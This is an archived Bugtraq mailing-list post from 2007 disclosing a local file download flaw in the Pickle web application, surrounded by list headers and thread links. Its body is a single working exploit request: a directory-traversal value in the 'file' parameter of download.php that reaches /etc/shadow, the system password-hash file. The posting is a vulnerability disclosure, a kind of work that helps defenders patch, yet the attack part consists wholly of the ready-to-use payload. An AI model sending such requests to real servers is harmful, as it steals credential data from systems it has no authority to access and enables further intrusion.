pickle download local file

To:	bugtraq@securityfocus.com
Subject:	pickle download local file
From:	none@none.com
Date:	23 Feb 2007 23:55:58 -0000
Delivered-to:	sp-com-lists@consult.net
Delivered-to:	bugtraq-list@securepoint.com
Delivered-to:	mailing list bugtraq@securityfocus.com
Delivered-to:	moderator for bugtraq@securityfocus.com
List-help:	<mailto:bugtraq-help@securityfocus.com>
List-id:	<bugtraq.list-id.securityfocus.com>
List-post:	<mailto:bugtraq@securityfocus.com>
List-subscribe:	<mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe:	<mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list:	contact bugtraq-help@securityfocus.com; run by ezmlm

download local file :
/Pickle/src/download.php?img=1&file=../../../../../../../../../../../../../etc/shadow&rotation=0&img=0


regards laurent gaffié

<Prev in Thread]	Current Thread	[Next in Thread>
pickle download local file, none <=

<Prev in Thread]

Current Thread

[Next in Thread>

Previous by Date:	[ MDKSA-2007:049 ] - Updated spamassassin packages fix DoS vulnerability, security
Next by Date:	Re: Stack Overflow in Third-Party ActiveX Controls affects Multiple Vendor Products Including Some Symantec Consumer Products and Automated Support, John Smith
Previous by Thread:	[ MDKSA-2007:049 ] - Updated spamassassin packages fix DoS vulnerability, security
Next by Thread:	Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final, krasza
Indexes:	[Date] [Thread] [Top] [All Lists]

Previous by Date:

[ MDKSA-2007:049 ] - Updated spamassassin packages fix DoS vulnerability, security

Next by Date:

Re: Stack Overflow in Third-Party ActiveX Controls affects Multiple Vendor Products Including Some Symantec Consumer Products and Automated Support, John Smith

Previous by Thread:

[ MDKSA-2007:049 ] - Updated spamassassin packages fix DoS vulnerability, security

Next by Thread:

Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final, krasza

Indexes:

[Date] [Thread] [Top] [All Lists]